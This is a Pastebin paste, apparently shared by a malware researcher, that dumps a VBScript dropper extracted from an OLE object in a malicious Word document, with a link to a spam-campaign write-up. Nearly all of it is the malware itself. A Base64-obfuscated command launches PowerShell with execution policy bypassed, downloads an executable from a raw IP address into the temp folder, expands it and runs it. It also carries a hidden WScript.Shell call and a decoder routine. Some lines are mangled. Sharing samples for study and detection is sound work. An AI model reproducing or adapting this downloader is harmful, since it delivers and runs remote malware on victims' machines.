Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- VBA from malicious OLE objected embedded in DOC.
- http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
- -------------------
- Doc_SI2ev??slx.vbsC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev??slx.vbs4C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev??slx.vbshGVhkjbjv = Base64Decode("Y21kIC9LIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1ub3Byb2ZpbGUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovLzkxLjIyNy4xOC43Ni9zbW9venkvc2hha2UuZXhlJywnJVRFTVAlXEpJT2lvZGZoaW9JSC5jYWInKTsgZXhwYW5kICVURU1QJVxKSU9pb2RmaGlvSUguY2FiICVURU1QJVxKSU9pb2RmaGlvSUguZXhlOyBzdGFydCAlVEVNUCVcSklPaW9kZmhpb0lILmV4ZTs=")
- CreateObject(Base64Decode("V1NjcmlwdC5TaGVsbA==")).Run(""& GVhkjbjv &"") 0
- Function Base64Decode(ByVal base64String)
- Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
- Dim dataLength sOut groupBegin
- base64String = Replace(base64String vbCrLf """)
- base64String = Replace(base64String, vbTab, "")
- base64String = Replace(base64String, "" " """)
- dataLength = Len(base64String)
- If dataLength Mod 4 <> 0 Then
- Err.Raise 1, ""Base64Decode" Bad Base64 string.
- Exit Function
- End If
- For groupBegin = 1 To dataLength Step 4
- Dim numDataBytes CharCounter thisChar thisData nGroup pOut
- numDataBytes = 3
- nGroup = 0
- For CharCounter = 0 To 3
- thisChar = Mid(base64String groupBegin + CharCounter 1)
- If thisChar = "=" Then
- numDataBytes = numDataBytes - 1
- thisData = 0
- Else
- thisData = InStr(1 Base64 thisChar vbBinaryCompare) - 1
- End If
- If thisData = -1 Then
- Err.Raise 2 Base64Decode Bad character In Base64 string.
- Exit Function
- End If
- nGroup = 64 * nGroup + thisData
- Next
- nGroup = Hex(nGroup)
- nGroup = String(6 - Len(nGroup) "0"") & nGroup
- pOut = Chr(CByte(""&H"" & Mid(nGroup, 1, 2))) + _
- Chr(CByte(""&H"" & Mid(nGroup, 3, 2))) + _
- Chr(CByte(""&H"" & Mid(nGroup, 5, 2)))
- sOut = sOut & Left(pOut, numDataBytes)
- Next
- Base64Decode = sOut
- End Function3C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev. slx.vbsDoc_SI2ev. slx.vbsWC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev. slx.vbs
- "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement